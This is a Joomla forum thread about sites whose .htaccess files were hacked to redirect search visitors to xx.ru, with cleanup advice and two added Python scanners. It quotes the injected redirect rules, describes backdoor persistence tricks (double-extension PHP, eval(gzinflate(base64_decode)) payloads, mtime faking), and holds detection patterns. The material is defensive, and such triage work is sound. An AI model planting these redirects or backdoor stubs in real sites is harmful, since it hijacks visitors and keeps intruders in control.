htaccess hacked, re-directing traffic to xx.ru
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
First, "dot" files are hidden files that are not accessible to normal web requests (viewing) on a properly configured server, just as a properly configured server won't list directory contents. On an improperly configured server that will expose the htaccess and directory contents, then showing the htaccess file or listing directory contents is going to be the least of your worries.
To answer your question though, yes the added code (either version) does prevent viewing the file, just not when someone hacks your site.
Once access to a site/domain is gained by some means other than normal web access, then everything is accessible. It does not matter what is put into the htaccess to "prevent" viewing. This includes the htaccess file, any password protected directories, any configuration files, and anything else both inside of and outside of the public_html directory.
Put it like this: if I gain access then I can drop a 60k file on your site in some directory you're not likely to look in or replace in an update. I can then view and control all aspects of your domain while I sit at my computer, no usernames and no passwords are required. All I have to do is call my script from a browser and bingo, your entire domain is in front of me for me to do as I like.
Since it seems popular to add redirects to bad sites in your htaccess, then I'll put a hidden script somewhere on your site to do this and detect if the code I added is removed. If so then the script will put it back. If I'm smart I'll go slightly more sophisticated, automate my scripts to replicate, hide my script(s) better and add a backdoor so you can't find script(s) by scanning for some @eval(gzinflate(base64_decode($code))); code. I'll also change the mtime of any files I add code to so the mtime is the same as what it originally was before I touched it.
On a misconfigured server or one with some exploit I can take advantage of, this same 60k script will allow me to both see and access every other domain account on the server as if it were a local drive on my computer and will in most cases also allow me to control the entire server. No root user or root password needed.
So unless you completely delete everything in the public_html directory and inspect closely whatever you're going to reuse, and update everything to the latest version to close the security hole, and follow the rest of the stuff on the checklists, I will be back. If for no other reason than to mess with you. BTW, remember that large image directory you did not take the time to inspect? It's only photos so no need to, right? Well I put a file in there called rockymountain.php.jpg that allows me access to your site so I can hack your freshly cleaned and restored site.
PhilD
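PhilD's post lists the things a cleanup has to look for by hand: PHP parked under a double extension in a media directory (rockymountain.php.jpg), packed eval(gzinflate(base64_decode())) payloads, and PHP files sitting in directories that should hold nothing executable. The script below is an added example written for this thread, not code from PhilD or from the Joomla project. The directory list, the extension list and the regex set are my assumptions, and the files it scans are constructed in a temporary directory by demo(); point scan_webroot() at a real public_html to use it for triage.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Joomla directories that should hold media or scratch data, never executable PHP.
# Assumed layout for this example; extend it for your own site.
NON_CODE_DIRS = {"images", "tmp", "cache", "logs"}

# Extensions Apache's PHP handler may act on. With an AddHandler-style configuration,
# mod_mime looks at every extension in a name, so "rockymountain.php.jpg" can run as PHP.
PHP_EXTS = {".php", ".phtml", ".php5", ".phar"}

# Obfuscation idioms typical of dropped backdoors, including the one PhilD quotes.
# Constructed regexes for this example; a clean site has no reason to contain them.
SUSPICIOUS_PATTERNS = [
    ("eval(gzinflate(base64_decode))", re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode", re.I)),
    ("eval(base64_decode)", re.compile(r"eval\s*\(\s*base64_decode", re.I)),
    ("eval(str_rot13)", re.compile(r"eval\s*\(\s*str_rot13", re.I)),
    ("preg_replace with /e modifier", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
]

MAX_SCAN_BYTES = 2 * 1024 * 1024  # skip huge media files; backdoors are small


def has_hidden_php_extension(name: str) -> bool:
    """True when a PHP extension sits before the final extension, e.g. 'photo.php.jpg'."""
    suffixes = [s.lower() for s in Path(name).suffixes]
    return any(s in PHP_EXTS for s in suffixes[:-1])


def content_idioms(path: Path) -> List[str]:
    """Labels of the obfuscation idioms found in the file (decoded leniently as UTF-8)."""
    try:
        if path.stat().st_size > MAX_SCAN_BYTES:
            return []
        text = path.read_bytes().decode("utf-8", errors="replace")
    except OSError:
        return []
    return [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(text)]


def scan_webroot(root) -> List[Tuple[str, str]]:
    """Walk the web root and return sorted (relative path, reason) findings."""
    root = Path(root)
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        top = rel_dir.parts[0] if rel_dir.parts else ""
        for name in files:
            path = Path(dirpath) / name
            rel = (rel_dir / name).as_posix()
            if has_hidden_php_extension(name):
                findings.append((rel, "php extension hidden before final extension"))
            if path.suffix.lower() in PHP_EXTS and top in NON_CODE_DIRS:
                findings.append((rel, f"php file inside non-code directory '{top}'"))
            for label in content_idioms(path):
                findings.append((rel, f"obfuscation idiom: {label}"))
    return sorted(findings)


def demo() -> List[Tuple[str, str]]:
    """Build a constructed mini web root in a temp dir and scan it (sample data, not a real site)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "tmp").mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "images" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 fake jpeg header")
        # The double-extension trick PhilD describes, carrying a packed payload stub.
        (root / "images" / "rockymountain.php.jpg").write_text(
            "<?php @eval(gzinflate(base64_decode($code))); ?>\n")
        # A PHP file parked in tmp/, like the _cache_*.php file found later in the thread.
        (root / "tmp" / "_cache_example.php").write_text("<?php echo 'placeholder'; ?>\n")
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

The scan only knows the idioms it is given, which is exactly PhilD's point about a smarter intruder hiding the script better: treat a clean run as triage, not as proof, and still rebuild from known-good files.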
-
- Joomla! Fledgling
- Posts: 4
- Joined: Thu Feb 16, 2012 10:45 am
Re: htaccess hacked, re-directing traffic to xx.ru
Thanks for all your replies. Issue is resolved for me; here's what I did:
- Upgraded all extensions to latest version
- Upgraded to latest Joomla
- Disabled eXtplorer (I don't even remember having it installed!)
- Blocked all admin accounts except for mine
- Changed my admin password
- Changed the FTP password
- Unpacked Joomla full version on to web server root, deleted installation folder
- Manually deleted all .htaccess files which were in the root and ALL 1st level folders
- Used Admin Tools to generate a new htaccess file, left all settings as default
- Updated passwords for relevant admin accounts to be reactivated
Seems to all be working good now. Thanks again for your replies. I have a huuuuuuge image directory on this site so there may still be malicious code lingering around. I'm going to download the whole site and sift through it manually to see if I can find anything else.
My host said that it's likely access was given to super admin account as there was an account with user of admin and password of password, which there definitely was not on the site previously. I'll be updating the database password too.
Cheers
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Nov 24, 2008 3:07 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Ok, this issue affected me, - I tried everything but in the end the only thing that worked was biting the bullet and wiping the original Joomla install and installing the latest version (I know, I know this is what we are told by mods and experts but you'll try anything to cut corners - Thanks for the advice all)
Only posting this to save others some time if they think there is an easy shortcut
was also running PHPBB on my site - luckily did not need to remove and restore that
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
big vern wrote: (I know, I know this is what we are told by mods and experts but you'll try anything to cut corners -
translates to http://docs.joomla.org/Top_10_Stupidest ... tor_Tricks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
mandville wrote: translates to
ho,ho,ho,ho Mandville THAT is MEAN! (lot of high grade salt in open wounds) lol
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Site hacked .htaccess keeps changing
Hi Guys
I think my site has been hacked and I'm getting redirects to a russian site and pages not loading as they should. The main .htaccess file keeps changing / reappearing after deleting
400 http://xx.ru/in.cgi?4
ErrorDocument 401 http://xx.ru/in.cgi?4
ErrorDocument 403 http://xx.ru/in.cgi?4
ErrorDocument 404 http://xx.ru/in.cgi?4
ErrorDocument 500 http://xx.ru/in.cgi?4
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite
</IfModule>
Any advice would be good. Have had a good search around on the forum and don't really know what to do next. Although had a Joomla site for many years, I've not had to deal with anything like this before!
Many thanks
Andy
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:
Basic Environment ::
Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187
Detailed Environment ::
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered ::
Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Mon Apr 02, 2012 7:18 pm, edited 1 time in total.
Reason: trimmed code, removed link
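The .htaccess fragment Andy quotes has two tell-tale parts: ErrorDocument lines that hand every error response to an off-site URL, and a RewriteCond keyed on search-engine referrers, so only visitors arriving from a search result get redirected and the owner browsing the site directly sees nothing wrong. The following audit script is an added example, not code from the thread or from Joomla. It flags those directive shapes; the site hostname, the extra engine names (bing, msn, yandex) and the RewriteRule target in the constructed sample are my assumptions, since the quoted fragment is cut off before any RewriteRule.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Referrer names the injected rule keyed on, per the fragment in the thread, plus a few
# other engines such rules commonly list (bing, msn, yandex are my additions).
SEARCH_ENGINES = {"google", "ask", "yahoo", "baidu", "youtube", "wikipedia", "qq",
                  "excite", "bing", "msn", "yandex"}


def external_host(target: str, site_host: str) -> Optional[str]:
    """Hostname of `target` if it is an absolute URL pointing off-site, else None."""
    parts = urlsplit(target)
    if parts.scheme in ("http", "https") and parts.hostname and parts.hostname != site_host:
        return parts.hostname
    return None


def audit_htaccess(text: str, site_host: str) -> List[Tuple[int, str]]:
    """Return (line number, finding) pairs for directives that send visitors off-site
    or that key on search-engine referrers, the cloaking pattern seen in this thread."""
    findings: List[Tuple[int, str]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        directive = tokens[0].lower()
        if directive == "errordocument" and len(tokens) >= 3:
            host = external_host(tokens[2], site_host)
            if host:
                findings.append((lineno, f"ErrorDocument {tokens[1]} sends visitors off-site to {host}"))
        elif directive == "rewritecond" and len(tokens) >= 3 and tokens[1].upper() == "%{HTTP_REFERER}":
            names = {w.lower() for w in re.findall(r"[a-z0-9]+", tokens[2], re.I)}
            hits = sorted(names & SEARCH_ENGINES)
            if hits:
                findings.append((lineno, "RewriteCond keys on search-engine referrers: " + ", ".join(hits)))
        elif directive == "rewriterule" and len(tokens) >= 3:
            host = external_host(tokens[2], site_host)
            if host:
                findings.append((lineno, f"RewriteRule redirects to off-site host {host}"))
    return findings


# Constructed sample: the ErrorDocument lines are as quoted in Andy's post; the RewriteCond
# is the quoted fragment made syntactically complete; the RewriteRule target is a placeholder
# added here (the thread's fragment is cut off before it); the last line is a benign local
# 404 handler for comparison.
SAMPLE_HTACCESS = """\
ErrorDocument 400 http://xx.ru/in.cgi?4
ErrorDocument 401 http://xx.ru/in.cgi?4
ErrorDocument 403 http://xx.ru/in.cgi?4
ErrorDocument 404 http://xx.ru/in.cgi?4
ErrorDocument 500 http://xx.ru/in.cgi?4
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite) [NC]
RewriteRule .* http://redirect-host.invalid/landing [R=302,L]
</IfModule>
# benign: a 404 handler inside the site itself
ErrorDocument 404 /index.php?option=com_content&view=article&id=404
"""


def audit_sample() -> List[Tuple[int, str]]:
    """Run the audit over the constructed sample as if the site were www.example.org."""
    return audit_htaccess(SAMPLE_HTACCESS, "www.example.org")


if __name__ == "__main__":
    for lineno, finding in audit_sample():
        print(f"line {lineno}: {finding}")
```

Run audit_htaccess() over every .htaccess under the web root, not only the one in public_html: several posters in this thread found copies in every core sub-directory, and a local ErrorDocument path (the last line of the sample) produces no finding, which is what a legitimate Joomla .htaccess looks like.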
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Site hacked .htaccess keeps changing
Can you run the FPA with the extensions showing ?
Have you checked your computer ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
Thanks for reply: Computer has been checked for viruses and malware
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:
Basic Environment ::
Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187
Detailed Environment ::
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) :: None
Database Information ::
Database _FPA_STATS :: Uptime: 2317620 | Threads: 1 | Questions: 2493237 | Slow queries: 0 | Opens: 3078 | Flush tables: 1 | Open tables: 1318 | Queries per second avg: 1.75 |
Extensions Discovered ::
Components :: SITE :: com_wrapper (2.5.0) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_[youtube]_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | com_mailto (2.5.0) | os_authnet (1.0) | os_eway (1.0) | os_worldpay (1.0) | os_offline (1.0) | os_paypal (1.0) |
Components :: ADMIN :: com_banners (2.5.0) | com_messages (2.5.0) | com_admin (2.5.0) | com_plugins (2.5.0) | com_cpanel (2.5.0) | com_login (2.5.0) | JCE (2.0.21) | Editor - JCE (2.0.21) | Unknown (-) | AcyMailing (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing Module (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing Tag : content inser (3.6.0) | AcyMailing : (auto)Subscribe d (3.6.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | com_templates (2.5.0) | com_checkin (2.5.0) | com_newsfeeds (2.5.0) | com_joomlaupdate (2.5.0) | com_modules (2.5.0) | com_content (2.5.0) | com_redirect (2.5.0) | com_categories (2.5.0) | com_weblinks (2.5.0) | com_finder (2.5.0) | com_users (2.5.0) | Event Booking (1.4.4) | com_config (2.5.0) | com_installer (2.5.0) | com_search (2.5.0) | com_media (2.5.0) | com_cache (2.5.0) | com_menus (2.5.0) | JoomGallery (2.0.0) | COM_GCALENDAR (2.6.4) | com_languages (2.5.0) |
Modules :: SITE :: mod_wrapper (2.5.0) | mod_custom (2.5.0) | mod_login (2.5.0) | MOD_GCALENDAR_NEXT (2.6.4) | mod_whosonline (2.5.0) | mod_articles_archive (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | EB Cart (1.0.0) | mod_languages (2.5.0) | mod_footer (2.5.0) | AcyMailing Module (3.6.0) | mod_syndicate (2.5.0) | mod_banners (2.5.0) | mod_search (2.5.0) | mod_weblinks (2.5.0) | mod_users_latest (2.5.0) | mod_articles_latest (2.5.0) | mod_related_items (2.5.0) | Ebooking Mini Calendar (1.0) | Up-coming events (1.2) | mod_articles_category (2.5.0) | Search Events (1.0) | JoomImages (2.0 BETA 5) | mod_articles_popular (2.5.0) | Events By Location (1.0) | mod_articles_news (2.5.0) | MOD_GCALENDAR (2.6.4) | mod_random_image (2.5.0) | Event Categories (1.0) | MOD_GCALENDAR_UPCOMING (2.6.4) | mod_stats (2.5.0) | mod_articles_categories (2.5.0) | mod_breadcrumbs (2.5.0) | mod_finder (2.5.0) |
Modules :: ADMIN :: mod_title (2.5.0) | mod_custom (2.5.0) | mod_multilangstatus (2.5.0) | mod_login (2.5.0) | mod_toolbar (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | mod_submenu (2.5.0) | mod_version (2.5.0) | mod_logged (2.5.0) | mod_status (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_latest (2.5.0) |
Plugins :: SITE :: plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Tag : content inser (3.6.0) | plg_search_weblinks (2.5.0) | plg_search_gcalendar (2.6.4) | plg_search_newsfeeds (2.5.0) | Search - Event Booking (1.0) | plg_search_content (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_system_logout (2.5.0) | plg_system_log (2.5.0) | plg_system_gcalendar (2.6.4) | plg_system_cache (2.5.0) | plg_system_redirect (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_highlight (2.5.0) | plg_system_languagecode (2.5.0) | plg_system_remember (2.5.0) | JA T3 Framework (2.5.1) | plg_system_p3p (2.5.0) | Google Maps (2.15) | plg_system_sef (2.5.0) | plg_system_debug (2.5.0) | ebreminder (1.4.4) | AcyMailing : (auto)Subscribe d (3.6.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | PLG_JOOMBU (2.0 BETA) | plg_editors-xtd_article (2.5.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.4.9) | Editor - JCE (2.0.21) | Events Booking - Cart Update (1.0) | Events Booking - ACYMailing ne (1.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_authentication_gmail (2.5.0) | EB Event Plugin (1.0) | plg_content_emailcloak (2.5.0) | plg_content_geshi (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_vote (2.5.0) | plg_content_pagebreak (2.5.0) | 
plg_content_joomla (2.5.0) | EB Register Plugin (1.0) | PLG_JOOMPLU (2.0 BETA) | plg_gcalendar_next (2.6.4) | plg_content_pagenavigation (2.5.0) | plg_content_finder (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_extension_joomla (2.5.0) |
Templates Discovered ::
Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I have one Joomla 1.5.25 site that got this same hack to the .htaccess file. There were also .htaccess files with the malicious code in every Joomla sub directory, modules, plugins, administrator, images, templates, etc....
I have lots of Joomla sites on another host that has not been hacked, but I have one client that hosts his own site on a GoDaddy account.
I deleted every single folder & file on the hosting account & restored from a "History" version that GoDaddy keeps. This version did not have the malicious .htaccess files in it.
I upgraded to Joomla 1.5.26 but within a few minutes the root directory & all the Joomla sub directories had the hacked .htaccess files in them again (not sure if they got generated before I did the 1.5.26 upgrade.)
I deleted them again & so far they have not come back.
If they come back again I will post here.
I am wondering if they came from another account on the same server?
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
The malicious code is back in the .htaccess file!
Not sure what is generating the code or where it is coming from.
The core joomla sub directories also have new .htaccess files in them, so far they are empty but I know some code is about to appear in them soon.
Not sure what to do about this now.
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
If people run the cron commands here http://docs.joomla.org/Security_Checkli ... d_and_cron then that may help time stamp the insertion of the code so that your logs/host can track it down.
Note: on some busy sites a large email will be produced.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
